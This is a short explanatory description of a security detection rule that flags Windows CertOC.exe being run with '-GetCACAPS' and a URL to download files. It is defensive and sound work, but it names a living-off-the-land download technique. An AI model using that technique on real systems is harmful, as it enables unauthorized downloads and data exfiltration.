This detection rule identifies malicious activity where a user downloads files using CertOC.exe, a Windows utility that is often leveraged by adversaries to perform command-and-control activities. The rule focuses on process creation events and specifies conditions under which CertOC.exe is invoked. Key indicators include checking the image ends with '\certoc.exe' and analyzing the command line arguments for those that contain '-GetCACAPS' and a URL (indicating an HTTP request). The rule combines these selections to trigger an alert for potential abuse of the CertOC.exe executable. This detection is relevant given the role of CertOC in network-related functions, which can be exploited for unauthorized file downloads or data exfiltration. Baseline activity should be reviewed to mitigate false positives, as legitimate uses of CertOC.exe may exist in certain organizational contexts.